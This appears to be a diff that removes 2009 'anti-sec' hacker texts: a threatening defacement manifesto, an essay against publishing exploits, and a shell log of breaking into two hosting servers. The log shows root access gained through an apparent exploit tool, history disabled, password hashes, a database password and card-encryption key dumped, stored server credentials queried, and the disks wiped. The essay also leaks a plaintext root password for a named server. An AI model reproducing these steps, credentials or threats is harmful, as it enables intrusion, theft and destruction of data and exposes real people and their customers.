unmerciful elimination of all supporters of full-disclosure
and the security industry in its present form. If you own a security
blog, an exploit publication website or you distribute any exploits...
"you are a target and you will be rm'd. Only a matter of time."
This isn't like before. This time everyone and everything is getting
owned.
Signed: The Anti-sec Movement
"No images were harmed in the making of this... image."
anti-sec:~/pwn# perl img-scan.pl
Found img1.imageshack.us - lighttpd/1.4.18 - SSH-1.99-OpenSSH_4.5
[snip]
Found img998.imageshack.us - lighttpd/1.4.18 - SSH-1.99-OpenSSH_4.5
anti-sec:~/pwn# perl mass-pwn.pl
Connecting...
Linux worf.imageshack.us 2.6.15-1.2054_FC5 #1 SMP Tue Mar 14 15:48:20 EST 2006 x86_64 x86_64 x86_64 GNU/Linux
Replacing images...
img1 --> img998
All images replaced: http://img998.imageshack.us/antisec.jpg
If you think that we oppose your website, our advise is to pack it up and shut it down, because we're coming for you.
- anti-sec.

291
anti-sec/romeo-last-stand.txt
View file

@ -1,291 +0,0 @@
__ .__
_____ ____ _/ |_ |__| ______ ____ ____
\__ \ / \\ __\| | / ___/_/ __ \_/ ___\
/ __ \_| | \| | | | \___ \ \ ___/\ \___
(____ /|___| /|__| |__|/____ > \___ >\___ >
\/ \/ # exit \/ \/ \/*no more*
-----[ Intro:
No, romeo.copyandpaste.info did not get hacked, I am just doing what should be done about this mess...
A few companies were getting hacked by anti-sec just now, but I decided you don't deserve to know who gets owned,
I will keep the access to myself and you will _never_ know you got hacked.
Let me try and make a few things clear.
-----[ The Beginning:
93K Jun 4 astalavista.txt
This is where it all started, 'anti-sec' the 'group' name was born there, people made up the rest of stories and believed them.
159K Jun 10 nowayout.txt
He is a moron, 'nuff said.
27K Jul 3 ssanz-pwned.txt
Swear by your own security, this is where it gets you.
3.4K Jul 10 imageshack-pwned.txt
Sent the message to everyone, everyone understood it differently.
--[ Astalavista - The hacking and security community.
They didn't have hackers, security or a community, I did the Internet a favor by taking them down.
--[ Glafkos / nowayout - The CEH / Security Expert / [Insert-IT-Cert-Here].
He couldn't stop an attack on his own server, got rm'd and shutdown while he is actually logged on the server...
How pathetic.
--[ SSANZ - Server Systems Administration NZ, Security, Hardening and Backup solutions.
They couldn't secure their servers and had no backups... 'nuff said?
--[ ImageShack.
Even though it clearly said:
"No images were harmed in the making of this... image."
Most of you idiots reacted with:
"omg what does imageshack have to do with security, those guys are brutal and against their own beliefs".
-----[ You are a moron:
So a 'group' by the name of 'anti-sec' who are *against full-disclosure* publishes a hack-log with a few exploits used in it...
The whole idea is that you, the script kiddie (along with the rest of the Internet) NEVER knew how anti-sec actually got in, get it now?
felosi decides it is actually an OpenSSH 0day,
WebHosting Talk forums makes a huge hype about it,
SANS believes it,
HostGator DISABLES OpenSSH on all servers and claims they have a fix for it,
TheRegister writes about it...
...and the rest of the Internet and the 'security industry', just like sheep, follows everyone else and
claims surface of 'patches' for the 0day, some said they will release it on DefCon, others started there
own fake exploit (Some people actually fell for that)...
You people are a pack of morons, honestly.
I let you talk about it, laughed as some of you started writing patches, then I had my share of lulz when
hosts decided to shut down OpenSSH because of a rumor that was started by felosi because a client of his
(nowayout / Glafkos the security expert, remember him?); thought it was an OpenSSH 0day. lol.
This is just another proof of how stupid the people you go to for 'security' online, how easy it is to create
havoc online amongst you, I didn't even have to start the rumor, your own people did and you believed it.
-----[ anti-security:
Now off to another, more important point; anti-security...
*This is my idea of anti-security, you are free to have your own, but the ideas I saw online are stupid, really*
Some of you thought anti-security is against -security-, while it is really against the security -industry-,
I don't want you to be insecure to hack you, where is the challenge in that?
Others thought anti-security is about 0 disclosure of any kind, it is truly against full disclosure, where
an actual exploit code is posted instead of an advisory to the public...
I understand that disclosure is a must-have, I am not against it, I am against the people who post and help in
spreading exploit code, Can you please tell me what good (if any) comes out of posting exploit code?
I am pretty sure it does more harm than good, way more. Some suggested anti-sec should give people an alternative
of what should be done, well here it is, sirs..
Instead of posting an exploit code for the vulnerability you found, post an advisory, explain the vulnerability you found
to the people, gain fame and credit from it, attach a PoC if necessary... but do NOT post an exploit!
Now of course that will not stop 'hackers' from hacking, but it will decrease the number of random attacks, a lot,
and everyone will benefit from it, you will gain your fame and credit for it, you can post that on your sorry ass CV.
-----[ Comments and Response:
#bhf <+Aelphaeis> antisec hacked BHF ?
#bhf <+Aelphaeis> won't the antisec guys do it again ?
#bhf <+Aelphaeis> antisec, makes no fucking sense
#bhf <+Aelphaeis> BHF is clearly pro antisec
You are as stupid as you sound.
#bhf <%Glyph> 1. romeo.copyandpaste.info is a rr account.
#bhf <%Glyph> 2. romeo.copyandpaste.info's ns entries point to afraid.org
ORLY?
#bhf < HTH> I wonder who anti-sec is lulz
#bhf < HTH> Ive long since decided its not dark
#bhf < HTH> or r0meo
#bhf < HTH> so now im puzzled
I lol'd.
#bhf < fr0natz> HTH, I see that point.
#bhf < fr0natz> Romeo, lul'd a bit there.
So did he.
>>T Biehn < tbiehn@gmail.com>
>>1) Register 'Anti-Sec *' with Free Mail Provider
>>2) Claims to Full Disclosure
>>3) ????
>>4) PROFIT.
True that.
>>ifwm
>>So, Anti-sec is Microsoft?
No.
>>DrGirlfriend
>>what a group of assholes (anti-sec, not imagshack). Seriously, in what way was imageshack involved in their beef with the security profession?
What a moron.
>>siggplus
>>So hackers are against full disclosure? What a shocker.
I know right?
>>oobey
>>Woah, guys! I just discovered the most amazing thing - if you don't talk about bad things,
>>it's like they DON'T EXIST AT ALL!! As far as I'm concerned, I'm no longer living in a world with an economic crisis,
>>global warming, OR wars in the Middle East!
>>
>>Thanks, anti-sec!
As DarkPontifex would say, Cool story bro.
It is more like, if you do not practice, publish or mirror exploits, script kiddies wont exist at all and the world will be a better place!
No problem, btw.
>>SyrioForel
>>They're not trying to protect anybody from exploits, they're trying to protect their own exploits from being advertised. Get it?
Oh okay, thanks for clearing that up for me...
You are wrong, it is truly about not publishing exploits, you will not get our exploits because no one knows how we get in, when we got in, etc.
>>freshtimes
>>I don't think they're attacking you as much as using imageshack's prevalence across the internet
>>as a way to embed images as a vehicle for their message.
Finally someone gets it.
>>Clumpy
>>A self-righteous stupid hacker group at that. Full disclosure is the only thing that causes companies to patch.
>>History shows us, over and over again, that companies won't spend the money to patch security holes without full disclosure forcing them to it.
If you are so concerned about the patch, why don't you release a patch yourself instead of releasing an exploit code to 'force them to patch'.
>>alchemeron
>>A short-sighted approach. Part of the reason for a culture of published exploits is that,
>>if you don't publish or threaten to publish, companies will do absolutely nothing.
If everyone works by that, a lot more 'security' companies will be exposed, hacked and rm'd, because if you don't publish that they
cannot secure their own work, make backups or actually provide the service they offer, they will never fix it, right?
What about posting a nice advisory, saying you found vulnerability X in product Y, maybe a PoC. if company doesn't fix, you did your job,
no need to publish an exploit code and make thousands of websites / companies suffer while script kiddies ./xploit.
>>anti-antisec@hushmail.com
>>LMH, can you and your "Security Justice" friends please get laid
>>and leave the rest of us alone? This Anti-Sec rebranding is more
>>boredom.
>>
>>Oh- we know where you work, and who some of you really are. I
>>wonder how they'd feel about this stupidity?
You don't know anything about any of us and you will never.
Your servers were rooted back in 2007 and we never lost access until 2009 (maybe not), how do you feel about this stupidity?
>>Ant-Sec Movement < anti.sec.movement@gmail.com>
>>Dear Reader,
>>
>>In light of recent events, we have decided to clarify exactly what the Anti-Sec Movement is, and who we really are.
>>Firstly, Anti-Sec is NOT an individual clan or group; as the name implies, we are a movement
>>< snipped>
You have nothing to do with the movement, you saw a wave of people and posts talking about anti-sec and wanted to get some
attention on your sorry ass.
Your targets are still up, all you ever did was a pathetic DDoS attack. You fail.
>>http://www.theregister.co.uk/2009/07/13/imageshack_hack/
>>Ironically, exploit code associated with Anti-Sec's latest attack was posted on a full disclosure mailing list.
Nothing was ever posted, k?
...and many, many other stupid comments.
-----[ Outro:
Well I guess this is it, publicly owning people goes nowhere, people are too stupid, some love to make up their own stories
and others will do anything to ride a publicity wave... rarely ever anyone actually gets the point.
Before I leave you, I cannot stress enough that you are not as secure as you think you are,
Full-Disclosure brings more evil than good, it is the root of most DDoS attacks, random web defacement, spam, havoc, etc.
Publish an advisory if you must, do -not- publish an exploit, do -not- mirror exploits.
str0ke should realize by now that most of the botnets out there, the spam, the Turkish web defacement... is his fault.
If you think otherwise, do post about it, be sure that I will be reading it, but I doubt you can find more good coming out
of full-disclosure than evil.
And of course we must not forget, it is not just about Full-Disclosure, but also the people who claim they can protect you,
claim they are a security company, swear by their own security, etc. Actually cannot provide you with that service, they
cannot protect you, they cannot protect themselves, they don't know the basics of security, they read a tutorial on installing
CSF/LFD, mod_security, iptable OpenSSH and call it -secure-.
Take felosi for example, he runs secureservtech:
>>Extensive security to protect your sites and data from hackers.
>>Including mod_security, suhosin, cgi suexec,, php suexec, brute force protection on all protocols and more..
72.20.1.206 - backup.secureservtech.com - The main backup server for SST, it has access to every other server SST owns.
root:T6yHjuIkol0
*OpenSSH is whitelisted for specific IP's only, he included mod_security, suhosin patch, grsecurity, csf/lfd... How classic.
Did he protect his customers from hackers like he says? is *secure*servtech really *secure*? does felosi know he got owned?
No.
- Did you get scared of getting caught?
-- no, I just didn't like how this turned out to be, taking a different approach from now on.
- Are you going to stop shutting down people who publish exploits, exposing people who swear by their own security, etc?
-- no, but this time you will never know who got owned, no logs will be published, I will keep my access for greater benefit.
If you want the old page for any reason, you can download mirror here: http://romeo.copyandpaste.info/mirror.tgz
So Long, and Thanks for All the Fish.
- romeo.

679
anti-sec/ssanz-pwned.txt
View file

@ -1,679 +0,0 @@
__ .__
_____ _____/ |_|__| ______ ____ ____
\__ \ / \ __\ | ______ / ___// __ \_/ ___\
/ __ \| | \ | | | /_____/ \___ \\ ___/\ \___
(____ /___| /__| |__| /____ >\___ >\___ >
\/ \/ \/ \/ \/
Some of you have seen a lot of casualties lately in the webhosting scene:
hosting companies being wiped and rm'd at the expense of their clients. While
some of this is collateral damage, we're about to show you, ladies and
gentlemen, that sometimes you aren't pwned because of who you host but what you
say.
Practice what you preach.
- Why SSANZ?
Owned by a kid who claims he can manage, secure and audit servers,
he offers a service that he clearly cannot provide, we are against that.
LoganNZ <http://www.webhostingtalk.com/member.php?u=56008>:
>>Logan of New Zealand. CEO of Server Systems Administration NZ.
>>
>> Signature:
>>Server Systems Administration NZ | SSANZ
>>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
>>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems
Server Management $25 - Security & Hardening - $50 <http://www.webhostingtalk.com/showthread.php?t=857383>:
>>Server Management - $25 Per Month
>>
>>- Full Management - Support, & 3rd Party Installs
>>- Monitoring - Included - up to 3 ports.
>>- Emergency Recovery
>>Server Security - $50
>>
>>- Initial Scan & Report
>>- Security Hardening & Security Installs/tweaks.
>>- IDS, Security Monitoring & mod_sec configured.
>>- Finishing Security Scan & SSANZ Custom Scans.
>>
>>
>>Emergency Server Recovery - $150
>>
>>- Recover Hacked Server Systems
>>- Recover deleted data
>>- ANTI-dDOS Services
>>- dDOS Investigation
Security Worries? Security Audits - 50% OFF <http://www.webhostingtalk.com/showthread.php?t=859795>:
>>Get your site/server audited to ensure your business data is
>>secure before you become a statistic.
>>
>>In the past 6 months, e-crime activity reports have increased by
>>45% due to the global economic recession.
>>
>>What is involved in a Full Security Audit?
>>
>>External Security
>>
>> * Scan for Shells/malicious scripts
>> * Scan for vulnerable web content ( permissions, RFI's )
>> * Scans for Vulnerable Server Services
>> * Vulnerable Ports
>> * Testing of TCP handling - dDOS test.
>> * Scan for Vulnerable PHP scripts/mods.
>> * Control Panel Security Audit ( external )
>> * Multiple Unique SSANZ Custom Scans*
>>
>>
>>Internal Security
>>
>> * Permissions/Ownership(s) Review
>> * Apache/Webserver Security
>> * User Account Security & binaries access audit
>> * Local RFI Exploits located/patched.
>> * System Binary Security Audit
>> * Firewall/IPTABLES Audit
>> * Bruteforce detection test & audit
>> * Root Access Authentication Audit
>> * Local PHP Functions Audit
>> * Control Panel Security Audit ( Internal )
>> * Kernel Security Audit
>> * Additional SSANZ Custom Scans/Audit*
We at anti-sec decided to give you a _FREE_ Full Security Audit!*
* `rm -rf /` is included.
anti-sec:~/pwn# ./map ssanz.net
IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3
IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3
anti-sec:~/pwn# cd xpl/
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.143.133
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::
sh-3.2# w
03:43:43 up 7 days, 54 min, 1 user, load average: 9.01, 9.78, 10.73
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 125.238.144.224 20:17 7:26m 13:18 13:18 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 3008
drwxr-x--- 24 root root 4096 Jul 4 03:43 .
drwxr-xr-x 27 root root 4096 Jun 27 02:49 ..
-rw------- 1 root root 957 Jun 13 07:24 .accesshash
-rw------- 1 root root 1012 Jun 1 10:39 anaconda-ks.cfg
-rw------- 1 root root 15460 Jul 3 23:38 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 3 therockm therockm 4096 Jun 5 07:26 bwm-ng-0.6
-rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz
drwxr-xr-x 3 root root 4096 Nov 15 2006 cmm
-rw-r--r-- 1 root root 18656 Feb 28 11:32 cmm.tgz
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
-rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz
drwxr-xr-x 4 root root 4096 Jun 1 14:33 .cpanel
drwxr-xr-x 4 root root 4096 Jun 1 17:10 cpanel3-skel
drwx------ 3 root root 4096 Jun 1 13:50 .cpobjcache
drwxr-xr-x 10 root root 4096 Apr 13 16:17 csf
-rw-r--r-- 1 root root 430121 May 15 12:07 csf.tgz
-rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
drwx------ 2 root root 4096 Jun 1 13:54 .elinks
-rw-r--r-- 1 root root 1176672 Jul 4 03:40 error_log
-rw-r--r-- 1 root root 16 Jun 3 08:34 .forward
drwx------ 3 root root 4096 Jun 1 10:39 .gconf
drwx------ 2 root root 4096 Jun 1 10:39 .gconfd
drwxr-xr-x 4 root root 4096 Jun 10 23:42 .gem
drwx------ 2 root root 4096 Jun 1 13:55 .gnupg
drwxrwxrwx 5 theweath theweath 4096 Jun 1 17:13 htop-0.8.1
-rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz
-rw-r--r-- 1 root root 561 Jun 27 02:48 .htoprc
-rw-r--r-- 1 root root 8144 Jun 6 19:23 index.html
-rw-r--r-- 1 root root 4246 Jun 1 10:39 install.log.syslog
drwxr-xr-x 6 500 root 4096 Sep 13 2005 iptraf-3.0.0
-rw-r--r-- 1 root root 0 Jun 27 09:21 iptraf-3.0.0.tar.gz
-rw-r--r-- 1 root root 0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
-rw-r--r-- 1 root root 0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
-rw-r--r-- 1 root root 575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
drwx------ 6 root root 4096 Jun 1 14:21 .MirrorSearch
-rw------- 1 root root 61 Jun 12 21:04 .my.cnf
-rw------- 1 root root 139 Jul 3 10:51 .mysql_history
-rwxrwxrwx 1 root root 38688 Dec 1 2008 mysqltuner.pl
-rw-r--r-- 1 root root 264 Jul 2 21:43 .pearrc
drwxr-xr-x 2 root root 4096 Jun 1 17:04 public_ftp
drwxr-xr-x 3 root root 4096 Jun 1 17:04 public_html
-rw------- 1 root root 1024 Jun 7 19:50 .rnd
drwx------ 3 root root 4096 Jun 1 14:29 .spamassassin
drwx------ 2 root root 4096 Jun 2 06:41 .ssh
-rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
drwxr-xr-x 3 root root 4096 Jun 7 21:54 tmp
-rw------- 1 root root 0 Jun 7 22:01 .trustwavereqs
drw------- 2 root root 4096 Jun 3 08:18 whmrbackups
drw------- 3 root root 4096 Jun 10 08:25 whmrcorebackups
sh-3.2# cat .bash_history
htop
htop
p
htop
tail -f /var/log/secure
tail -f /var/log/secure
[snip]
nano highperformance.conf
service httpd restart
nano highperformance.conf
service httpd restart
nano highperformance.conf
nano httpd.conf
nano php.conf
ls
nano modsec2.conf
ls
[snip]
nano visit4cash.net.conf
cd ..
[snip]
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
ps -aux|grep -i HTTP|wc -l
w
bwm-ng
[snip]
netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n
netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n
[snip]
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
[snip]
service cups stop
chkconfig cups off
service nfslock stop
chkconfig nfslock off
service rpcidmapd stop
chkconfig rpcidmapd off
service bluetooth stop
chkconfig bluetooth off
service anacron stop
chkconfig anacron off
service avahi-daemon stop
chkconfig avahi-daemon off
service hidd stop
chkconfig hidd off
service pcscd stop
chkconfig pcscd off
[snip]
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
htop
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
[snip]
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
htop
[snip]
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz
[snip]
wget http://www.logview.org/logview-install
chmod +x logview-install
./logview-install
rm -rf logview-install
sh-3.2# grep sec /etc/userdomains
affiliatesecrets.wecloak.info: wecloaki
infosecawareness.info: andlyssa
secproxy.info: secproxy
infosecawareness.andly.ssanz.net: andlyssa
greycloud.nakedinsects.com: greyclou
serversecuritynz.com: forumz
orac.nakedinsects.com: oracnz
infernal.nakedinsects.com: infernal
nakedinsects.com: ni
fluffy.nakedinsects.com: fluffy
quickclix.orac.nakedinsects.com: oracnz
seco39.ssanz.net: secossan
sh-3.2# lastlog | grep -v Never
Username Port From Latest
root pts/1 125.238.144.224 Fri Jul 3 20:27:03 -0400 2009
simmobim pts/0 118.69.80.114 Fri Jun 12 00:22:04 -0400 2009
mattss pts/1 118.90.48.0 Sun Jun 21 04:44:58 -0400 2009
etasmtco pts/0 189.31.24.129 Sat Jun 20 10:14:51 -0400 2009
sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx--x--x 15 billing billing 4096 Jun 28 02:08 .
drwx--x--x 737 root root 20480 Jul 4 00:37 ..
lrwxrwxrwx 1 billing billing 33 Jun 2 01:58 access-logs -> /usr/local/apache/domlogs/billing
-rw------- 1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz
-rw------- 1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz
-rw------- 1 billing billing 84475934 Jun 3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz
-rw------- 1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz
-rw-r--r-- 1 billing billing 24 May 27 2008 .bash_logout
-rw-r--r-- 1 billing billing 176 May 27 2008 .bash_profile
-rw-r--r-- 1 billing billing 124 May 27 2008 .bashrc
-rw------- 1 billing billing 17 May 27 2008 .contactemail
drwxr-xr-x 5 billing billing 4096 May 8 02:48 .cpanel
-rw-r----- 1 billing billing 0 Apr 4 06:32 cpbackup-exclude.conf
drwxr-xr-x 2 billing billing 4096 Jun 2 01:57 cpmove.psql
drwxr-xr-x 3 billing billing 4096 Nov 12 2008 cpmove.psql.1240007789
drwxr-xr-x 2 billing billing 4096 Apr 16 23:24 cpmove.psql.1243922290
-rw-r--r-- 1 billing billing 532304 Jul 4 03:45 error_log
drwxr-x--- 4 billing mail 4096 Jan 19 21:39 etc
drwxr-x--- 2 billing nobody 4096 May 27 2008 .htpasswds
-rw-r--r-- 1 billing billing 7 Nov 12 2008 .lang
-rw------- 1 billing billing 15 Jun 28 02:07 .lastlogin
drwxrwx--- 10 billing billing 4096 Jul 2 21:43 mail
drwxr-xr-x 4 billing billing 4096 Nov 12 2008 .mozilla
drwxr-xr-x 3 billing billing 4096 Apr 29 2008 public_ftp
drwxr-x--- 24 billing nobody 4096 Jun 28 02:55 public_html
drwx------ 4 billing billing 4096 Jun 7 21:53 ssl
drwxr-xr-x 7 billing billing 4096 Feb 25 17:59 tmp
drwx------ 2 billing billing 4096 May 27 2008 .trash
lrwxrwxrwx 1 billing billing 11 Jun 2 01:58 www -> public_html
-rw-r--r-- 1 billing billing 658 May 27 2008 .zshrc
sh-3.2# cd www/
sh-3.2# ls
admin banned.php configuressl.php domainchecker.php init.php logout.php postinfo.html templates
viewticket.php whois.php
affiliates.php billing contact.php downloads installmingchowping modules _private templates_c _vti_bin
aff.php cart.php creditcard.php downloads.php knowledgebase.php networkissues.php register.php tutorials.php _vti_cnf
announcements.php cgi-bin dbconnect.php htaccess.txt lang networkissuesrss.php serverstatus.php upgrade
_vti_inf.html
announcementsrss.php clientarea.php display.php images libs order.php status upgrade.php _vti_log
announcements.xml configuration.php dl.php includes link.php passwordreminder.php submitticket.php viewemail.php _vti_pvt
attachments configuration.php.new dologin.php index.php login.php pipe supporttickets.php viewinvoice.php _vti_txt
sh-3.2# cat configuration.php
<?php
$license="93881365561d";
$db_host = "localhost";
$db_username = "billing_billusr";
$db_password = "X2qL6:qWCCb6";
$db_name = "billing_billing";
$cc_encryption_hash = "57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbzLLmTx9K";
$templates_compiledir = "templates_c/";
?>
sh-3.2# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11021136
Server version: 5.0.81-community MySQL Community Edition (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use billing_billing;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------------------+
| Tables_in_billing_billing |
+----------------------------+
| mod_ipmanager |
| mod_ipmonitor |
| tblaccounts |
| tblactivitylog |
| tbladdons |
| tbladminlog |
| tbladminperms |
| tbladminroles |
| tbladmins |
| tbladminsecurityquestions |
| tblaffiliates |
| tblaffiliatesaccounts |
| tblaffiliateshistory |
| tblaffiliatespending |
| tblaffiliateswithdrawals |
| tblannouncements |
| tblbannedemails |
| tblbannedips |
| tblbillableitems |
| tblbrowserlinks |
| tblcalendar |
| tblcancelrequests |
| tblclientgroups |
| tblclients |
| tblconfiguration |
| tblcontacts |
| tblcredit |
| tblcurrencies |
| tblcustomfields |
| tblcustomfieldsvalues |
| tbldomainpricing |
| tbldomains |
| tbldomainsadditionalfields |
| tbldownloadcats |
| tbldownloads |
| tblemails |
| tblemailtemplates |
| tblfraud |
| tblgatewaylog |
| tblhosting |
| tblhostingaddons |
| tblhostingconfigoptions |
| tblinvoiceitems |
| tblinvoices |
| tblknowledgebase |
| tblknowledgebasecats |
| tblknowledgebaselinks |
| tbllinks |
| tblnetworkissues |
| tblnotes |
| tblorders |
| tblpaymentgateways |
| tblpricing |
| tblproductconfiggroups |
| tblproductconfiglinks |
| tblproductconfigoptions |
| tblproductconfigoptionssub |
| tblproductgroups |
| tblproducts |
| tblpromotions |
| tblquoteitems |
| tblquotes |
| tblregistrars |
| tblservers |
| tblsslorders |
| tbltax |
| tblticketbreaklines |
| tblticketdepartments |
| tblticketescalations |
| tblticketlog |
| tblticketmaillog |
| tblticketnotes |
| tblticketpredefinedcats |
| tblticketpredefinedreplies |
| tblticketreplies |
| tbltickets |
| tblticketspamfilters |
| tbltodolist |
| tblupgrades |
| tblwhoislog |
+----------------------------+
80 rows in set (0.00 sec)
mysql> select name,ipaddress,hostname,username,password from tblservers;
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| name | ipaddress | hostname | username | password |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| Osiris | 66.197.143.133 | Osiris.ssanz.net | ssanz | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co= |
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
| Devil | 66.197.204.101 | devil.ssanz.net | root | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A== |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
3 rows in set (0.00 sec)
mysql> select firstname,lastname,email,username,password from tbladmins;
+-----------+----------+-----------------+----------+----------------------------------+
| firstname | lastname | email | username | password |
+-----------+----------+-----------------+----------+----------------------------------+
| Logan | Douglas | Logan@ssanz.net | Admin | c6df529826cf16ac5bedb424d8ac972b |
+-----------+----------+-----------------+----------+----------------------------------+
1 row in set (0.06 sec)
mysql> quit
Bye
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 2.0G 477M 1.4G 26% /
/dev/sda8 875G 147G 684G 18% /home
/dev/sda3 9.7G 6.8G 2.5G 74% /usr
/dev/sda2 9.7G 7.0G 2.3G 76% /var
/dev/sda1 99M 23M 72M 24% /boot
/dev/sda6 996M 64M 881M 7% /tmp
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sdb1 459G 163G 273G 38% /backup
sh-3.2# ./wipe
sh-3.2# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda5 64Z 64Z 1.5G 100% /
/dev/sda8 64Z 64Z 729G 100% /home
/dev/sda3 64Z 64Z 3.0G 100% /usr
/dev/sda2 64Z 64Z 3.0G 100% /var
/dev/sda1 16Z 16Z 0 100% /boot
/dev/sda6 64Z 64Z 933M 100% /tmp
tmpfs 3.9G 0 3.9G 0% /dev/shm
/dev/sdb1 64Z 64Z 296G 100% /backup
sh-3.2# exit
exit
-----------------------------------
osiris [ DOWN ]
devil [ UP ]
-----------------------------------
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.204.101
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::
sh-3.2# w
04:10:20 up 4 days, 12:11, 1 user, load average: 3.25, 2.09, 1.68
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 125.238.144.224 20:18 7:51m 6:38 6:38 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 1232
drwxr-x--- 23 root root 4096 Jul 4 04:06 .
drwxr-xr-x 25 root root 4096 Jun 29 14:33 ..
-rw------- 1 root root 957 Jun 13 05:20 .accesshash
-rw------- 1 root root 937 Jun 12 00:01 anaconda-ks.cfg
-rw------- 1 root root 7258 Jun 30 10:03 .bash_history
-rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
-rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
-rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
drwxrwxrwx 3 1000 1000 4096 Jun 12 04:45 bwm-ng-0.6
-rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz
drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq
